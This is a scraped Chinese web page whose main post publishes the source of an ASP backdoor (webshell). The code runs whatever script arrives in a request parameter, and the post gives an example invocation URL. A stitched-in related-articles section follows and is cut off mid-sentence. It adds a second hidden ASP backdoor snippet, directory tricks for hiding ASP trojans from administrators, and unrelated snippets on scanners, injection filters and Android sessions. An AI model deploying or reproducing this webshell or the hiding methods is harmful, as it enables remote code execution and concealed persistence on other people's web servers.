一个较新的ASP后门服务端实现代码_木马相关

今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用。研究了下方法,后来和lcx讨论了下。得到了如下代码,在此感谢前辈的指点,呵呵。

代码很简单,我就不多做解释了,以免有人骂我装。

复制代码 代码如下:

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数

'调用示例:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
%>

注意,虽然能用了,但是实验发现只有lake2客户端能用。希望有牛人出来改得通用一点。呵呵。自己写个客户端专用也不错。

转自:http://hi.baidu.com/ylbhz/blog

时间: 2024-10-12 09:05:36

一个较新的ASP后门服务端实现代码_木马相关的相关文章

一个较新的ASP后门服务端实现代码

今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用.研究了下方法,后来和lcx讨论了下.得到了如下代码,在此感谢前辈的指点,呵呵. 代码很简单,我就不多做解释了,以免有人骂我装. 复制代码 代码如下: <% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '参数S

隐蔽的ASP后门 大家可以查看下_木马相关

复制代码 代码如下: <%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=I

隐藏ASP木马后门的两种方法_木马相关

1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

淘特ASP木马扫描器的代码_木马相关

+-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序.系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了.目前可以查杀所有流行的ASP木马程序. 系统提供了全站扫描.按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描.扫描过程,系统会记录

一段asp防注入的通用脚本_木马相关

放在conn.asp里就行了.  '屏蔽通过地址栏攻击  url=Request.ServerVariables("QUERY_STRING")  if instr(url,";")>=1 then  url=Replace(url,";",":") : Response.Redirect("?" & url)  end if  '屏蔽通过表单攻击  for each item in requ

android与asp.net服务端共享session的方法详解

前言 最近因为工作的需要,要实现一个功能,就是需要通过发送短信进行注册,现在想把短信验证码放到服务器的session值中,当客户端收到短信并提交短信码时由asp.net服务端进行判断,那么如何共享这个session那么需要在android客户端中添加几行代码. 实现方法 如下操作.第一次数据请求时就获取这个cookie的名称并且得到这个cookie的值,这个即是sessionid的值并保存在一个静态变量中,然后在第二次请求数据的时候要将这个sessionid一并放在Cookie中发给服务器,服务

asp.net服务端怎么调用高德地图?

问题描述 asp.net服务端怎么调用高德地图?请高手帮忙 解决方案 解决方案二:看官方的API文档,先学会静态页面使用,再替换成动态即可.解决方案三:引用1楼guwei4037的回复: 看官方的API文档,先学会静态页面使用,再替换成动态即可. 怎么用高德restapi获取2点的路线?解决方案四:看文档及源码,跟着例子做一下就知道了.解决方案五:引用3楼guwei4037的回复: 看文档及源码,跟着例子做一下就知道了. 这个是用js去调用的,我用想用restapi通过http去请求,返回数据列

如何用C#实现一个客户端同时和多个服务端通讯

问题描述 我想实现一个客户端可以向多个服务端发起请求,并能异步获取到最先应答的服务端的回应,其他收到客户端请求信息但不是第一个应答的服务端不用回应,如何实现,请大家赐教,谢谢! 解决方案 解决方案二:第一个服务端不管?什么意思你怎么标识判断它是不是第一个??第一个传送数据过来的??解决方案三:你这是要进行UDP广播咯解决方案四:你会从客户端发起请求到服务端,就行了,其他的做个标志位,谁先返回,就改变标志位,其他的返回发现标志位已经改变,就不做处理了.解决方案五: 解决方案六:你有几个服务端,就定

JQuery以JSON方式提交数据到服务端示例代码_jquery

JQuery将Ajax数据请求进行了封装,从而使得该操作实现起来容易许多.以往我们要写很多的代码来实现该功能,现在只需要调用$.ajax()方法,并指明请求的方式.地址.数据类型,以及回调方法等.下面的代码演示了如何将客户端表单数据封装成JSON格式,然后通过JQuery的Ajax请求将数据发送到服务端,并最终将数据存储到数据库中.服务端定义为一个.ashx文件,事实上你可以将服务端定义为任何能接收并处理客户端数据的类型,如Web Service,ASP.NET Page,Handler等. 首